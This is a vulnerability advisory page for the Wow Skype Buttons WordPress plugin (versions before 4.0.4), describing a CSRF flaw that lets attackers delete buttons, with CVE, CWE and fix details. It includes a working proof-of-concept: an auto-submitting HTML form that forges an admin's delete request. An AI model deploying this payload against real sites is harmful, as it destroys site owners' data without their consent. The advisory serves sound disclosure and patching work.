WordPress Plugin Vulnerabilities

Wow Skype Buttons < 4.0.4 - Button Deletion via CSRF

Description

The plugin does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks

Proof of Concept

As an admin open HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=mwp-skype" method="POST">
        <input type="text" name="ID" value="1" />
        <input type="text" name="action" value="delete-items" />
        <input type="text" name="action2" value="delete-items" />
        action
        <input type="submit" value="submit">
    </form>
</body>
```

Affects Plugins

Plugin icon
mwp-skype
Fixed in 4.0.4

References

CVE
CVE-2024-3474

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
https://www.bobmatyas.com
Submitter twitter
bobmatyas
Verified
Yes
WPVDB ID
e5c3e145-6738-4d85-8507-43ca1b1d5877

Timeline

Publicly Published
2024-04-11 (about 1 months ago)
Added
2024-04-11 (about 1 months ago)
Last Updated
2024-04-11 (about 1 months ago)

Other

Published
Title
Published
2024-04-26
Title
Contact Form 7 Extension For Mailchimp <= 0.5.70 - Cross-Site Request Forgery
Published
2023-10-26
Title
Auto Limit Posts Reloaded <= 2.5 - Cross-Site Request Forgery
Published
2022-07-05
Title
AnyMind Widget <= 1.1 - Stored Cross-Site Scripting via CSRF
Published
2024-04-11
Title
Responsive Contact Form Builder & Lead Generation Plugin <= 1.8.9 - Missing Authorization
Published
2023-02-28
Title
HT Slider For Elementor < 1.4.0 - Arbitrary Plugin Activation via CSRF